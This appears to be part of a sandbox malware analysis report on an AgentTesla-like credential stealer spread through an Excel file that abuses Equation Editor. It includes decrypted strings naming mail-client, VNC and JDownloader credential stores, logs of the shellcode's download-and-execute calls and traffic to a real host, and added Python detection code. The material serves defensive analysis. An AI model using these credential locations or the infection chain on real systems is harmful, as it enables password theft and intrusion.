Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <server_ip>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: </server_ip>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <server_port>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: </server_port>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <server_user_name>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <server_user_name>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: </server_user_name>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <server_user_password>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <server_user_password>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: </server_user_password>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: FTPGetter
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: The Bat!
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: appdata
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \The Bat!
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Account.CFN
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Account.CFN
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Becky!
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: DataDir
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Folder.lst
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Mailbox.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Account
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: PassWd
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Account
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SMTPServer
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Account
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: MailAddress
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Becky!
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Outlook
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: IMAP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: POP3 Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: HTTP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SMTP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: IMAP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: POP3 Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: HTTP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SMTP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Server
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Windows Mail App
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Server
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SchemaId
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: pResourceElement
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: pIdentityElement
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: pPackageSid
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: pAuthenticatorElement
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: syncpassword
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: mailoutgoing
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: FoxMail
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Executable
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: FoxmailPath
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Storage\
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Storage\
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \mail
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \mail
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Accounts\Account.rec0
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Accounts\Account.rec0
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Account.stg
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Account.stg
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: POP3Host
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SMTPHost
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: IncomingServer
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Account
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: MailAddress
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: POP3Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Opera Mail
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: opera:
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: PocoMail
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: appdata
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Pocomail\accounts.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: POPPass
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SMTPPass
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SMTP
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: eM Client
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: eM Client\accounts.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: eM Client
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Accounts
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: "Username":"
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: "Secret":"
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: "ProviderName":"
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: o6806642kbM7c5
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Mailbird
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SenderIdentities
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Accounts
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Mailbird\Store\Store.db
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Server_Host
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Accounts
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Username
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: EncryptedPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Mailbird
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: RealVNC 4.x
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: RealVNC 3.x
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SOFTWARE\RealVNC\vncserver
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: RealVNC 4.x
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: RealVNC 3.x
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Software\ORL\WinVNC3
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: TightVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Software\TightVNC\Server
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: TightVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Software\TightVNC\Server
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: PasswordViewOnly
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: TightVNC ControlPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Software\TightVNC\Server
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ControlPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: TigerVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Software\TigerVNC\Server
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: passwd
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: passwd2
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ProgramFiles
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: passwd
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ProgramFiles
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: passwd2
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ProgramFiles
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: passwd
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ProgramFiles
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: passwd2
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: passwd
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: passwd2
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: JDownloader 2.0
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: JDownloader 2.0\cfg
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: JDownloader 2.0\cfg
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Paltalk
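The decrypted strings above are the credential-store locations (Outlook profile keys, Foxmail/Mailbird/eM Client/Opera Mail data files, VNC server registry values, JDownloader account files) that the RegSvcs.exe payload reads. They are useful as a memory signature, with one caveat: they only exist after the sample's string decryptor has run, and a .NET payload keeps them as UTF-16LE, so a plain ASCII search over a memory dump misses them. The scanner below is an added example written for this page, not code from the Joe Sandbox report; the family grouping, threshold and the constructed sample image are my own choices.

```python
# Added example (not from the Joe Sandbox report): score a memory dump or
# unpacked image for the credential-store strings the report's string
# decryptor recovered from RegSvcs.exe. The packed sample on disk will not
# match, because these strings are only present after runtime decryption,
# and .NET holds them as UTF-16LE, so both encodings are searched.
from collections import defaultdict

# Indicator strings copied from the decrypted-string list above, grouped by
# the application each stealer module targets. Scoring distinct families
# (rather than raw string count) avoids over-weighting one chatty module.
CREDENTIAL_TARGETS = {
    "outlook": [
        r"Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676",
        "IMAP Password",
        "POP3 Password",
        "SMTP Password",
    ],
    "foxmail": [
        r"HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1",
        r"\Accounts\Account.rec0",
        r"\Account.stg",
    ],
    "opera_mail": [r"\Opera Mail\Opera Mail\wand.dat"],
    "pocomail": [r"\Pocomail\accounts.ini", "POPPass", "SMTPPass"],
    "em_client": [r"eM Client\accounts.dat", "72905C47-F4FD-4CF7-A489-4E8121A155BD"],
    "mailbird": [r"\Mailbird\Store\Store.db", "EncryptedPassword"],
    "vnc": [
        r"SOFTWARE\RealVNC\WinVNC4",
        r"Software\TightVNC\Server",
        r"Software\TigerVNC\Server",
        r"\uvnc bvba\UltraVNC\ultravnc.ini",
    ],
    "jdownloader": ["org.jdownloader.settings.AccountSettings.accounts.ejs"],
}

ENCODINGS = ("ascii", "utf-16-le")


def find_targets(blob: bytes) -> dict:
    """Return {family: [matched strings]} for indicators found in blob in
    either ASCII or UTF-16LE form (a string counts once per family)."""
    hits = defaultdict(list)
    for family, needles in CREDENTIAL_TARGETS.items():
        for needle in needles:
            if any(needle.encode(enc) in blob for enc in ENCODINGS):
                hits[family].append(needle)
    return dict(hits)


def is_stealer_image(blob: bytes, min_families: int = 3) -> bool:
    """Flag when at least min_families distinct credential targets appear;
    a single family can occur in legitimate backup or migration tools."""
    return len(find_targets(blob)) >= min_families


def _constructed_sample() -> bytes:
    """Constructed stand-in for a RegSvcs.exe memory region: filler plus a
    few decrypted .NET strings in UTF-16LE. Not real sample data."""
    parts = [b"\x00" * 64, b"MZ\x90\x00", b"\x00" * 32]
    for s in (
        r"\Mailbird\Store\Store.db",
        "EncryptedPassword",
        r"Software\TightVNC\Server",
        r"\Account.stg",
        "org.jdownloader.settings.AccountSettings.accounts.ejs",
    ):
        parts.append(s.encode("utf-16-le") + b"\x00\x00" + b"\xcc" * 8)
    return b"".join(parts)


SAMPLE_IMAGE = _constructed_sample()

if __name__ == "__main__":
    for family, matched in sorted(find_targets(SAMPLE_IMAGE).items()):
        print(f"{family}: {matched}")
    verdict = "credential stealer (AgentTesla-like)" if is_stealer_image(SAMPLE_IMAGE) else "no match"
    print("verdict:", verdict)
```

Run it against a process dump of the injected RegSvcs.exe (the report's 6.2.RegSvcs.exe.400000.0.unpack region) rather than against the .xlsx or coolz.exe on disk; the same dump with only ASCII needles would return nothing, which is the point of searching both encodings.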

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 104.21.35.109 Port: 443
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\coolz.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 104.21.35.109:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: Binary string: wntdll.pdb source: coolz.exe, 00000005.00000003.483771153.0000000003970000.00000004.00001000.00020000.00000000.sdmp, coolz.exe, 00000005.00000003.483536666.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp
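The chain recorded in this section (EXCEL.EXE launching EQNEDT32.EXE with -Embedding, EQNEDT32.EXE connecting to 104.21.35.109:443, and EQNEDT32.EXE writing and starting coolz.exe under the user's Temp directory) is exactly what the Sigma rules listed at the top of the report key on: Equation Editor should never start processes, open sockets or write PE files. The URLDownloadToFileW / WinExec / ExitProcess call sequence in the next section is the shellcode that produces that behaviour. Below is an added example, not part of the Joe Sandbox report, that implements those detections over Sysmon-style events; the field names follow Sysmon (EventID, Image, ParentImage, TargetFilename, DestinationIp), the rule names and severities are my own, and the events are constructed to mirror the report's process tree rather than captured telemetry.

```python
# Added example (not from the report): Equation Editor abuse detection over
# constructed Sysmon-style events mirroring the report's process tree.
from dataclasses import dataclass
import ntpath

# Paths taken from the report's process tree, used to build the sample events.
EQNEDT_PATH = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
EXCEL_PATH = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
DROPPED_PATH = r"C:\Users\user\AppData\Local\Temp\coolz.exe"

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
EQNEDT = "eqnedt32.exe"
PE_SUFFIXES = (".exe", ".dll", ".scr", ".com")


@dataclass
class Finding:
    rule: str
    severity: str
    event: dict


def _basename(path):
    """Lower-cased file name of a Windows path (ntpath works off-Windows too)."""
    return ntpath.basename(path or "").lower()


def _in_user_profile(path):
    """True for images under C:\\Users\\<name>\\AppData\\..., where droppers land."""
    p = (path or "").lower()
    return p.startswith("c:\\users\\") and "\\appdata\\" in p


def evaluate(ev):
    """Apply the Equation Editor rules to one Sysmon-style event dict."""
    findings = []
    eid = ev.get("EventID")
    image = _basename(ev.get("Image"))
    parent = _basename(ev.get("ParentImage"))
    if eid == 1:  # ProcessCreate
        if parent == EQNEDT:
            # EQNEDT32.EXE renders equations; it has no reason to start anything.
            findings.append(Finding("eqnedt32_spawns_process", "high", ev))
        if parent in OFFICE_APPS and image == EQNEDT:
            # Also happens for benign documents with legacy equations: low only.
            findings.append(Finding("office_spawns_eqnedt32", "low", ev))
        if (parent in OFFICE_APPS or parent == EQNEDT) and _in_user_profile(ev.get("Image")):
            findings.append(Finding("office_child_in_user_dir", "high", ev))
    elif eid == 3 and image == EQNEDT:  # NetworkConnect
        findings.append(Finding("eqnedt32_network_connect", "high", ev))
    elif eid == 11 and image == EQNEDT:  # FileCreate
        if _basename(ev.get("TargetFilename")).endswith(PE_SUFFIXES):
            findings.append(Finding("eqnedt32_drops_pe", "high", ev))
    return findings


def scan(events):
    """Evaluate every event and return the flattened list of findings."""
    return [f for ev in events for f in evaluate(ev)]


# Constructed events mirroring the report's chain; not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": EQNEDT_PATH, "ParentImage": EXCEL_PATH,
     "CommandLine": f'"{EQNEDT_PATH}" -Embedding'},
    {"EventID": 3, "Image": EQNEDT_PATH, "DestinationIp": "104.21.35.109", "DestinationPort": 443},
    {"EventID": 11, "Image": EQNEDT_PATH, "TargetFilename": DROPPED_PATH},
    {"EventID": 1, "Image": DROPPED_PATH, "ParentImage": EQNEDT_PATH, "CommandLine": DROPPED_PATH},
    # Benign control: Excel starting the 64-bit print spooler helper from System32.
    {"EventID": 1, "Image": r"C:\Windows\System32\splwow64.exe", "ParentImage": EXCEL_PATH},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.event.get('Image')}")
```

The Excel-to-EQNEDT32 launch alone is kept at low severity because documents that embed legacy Equation 3.0 objects trigger it too; the three high-severity rules fire only on behaviour the component never needs. Microsoft removed the Equation Editor from Office in the January 2018 updates, so on a current install any EQNEDT32.EXE execution is itself worth a look.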

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036706E2 URLDownloadToFileW, 2_2_036706E2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03670659 LoadLibraryW,URLDownloadToFileW, 2_2_03670659
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0367072D WinExec,ExitProcess, 2_2_0367072D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036705E9 URLDownloadToFileW, 2_2_036705E9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03670673 URLDownloadToFileW, 2_2_03670673
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0367074D ExitProcess, 2_2_0367074D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036705CD URLDownloadToFileW, 2_2_036705CD
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036705B4 ExitProcess, 2_2_036705B4
Source: global traffic DNS query: name: menyos.com
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443 (identical outbound entry repeated 272 times in the original report)
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
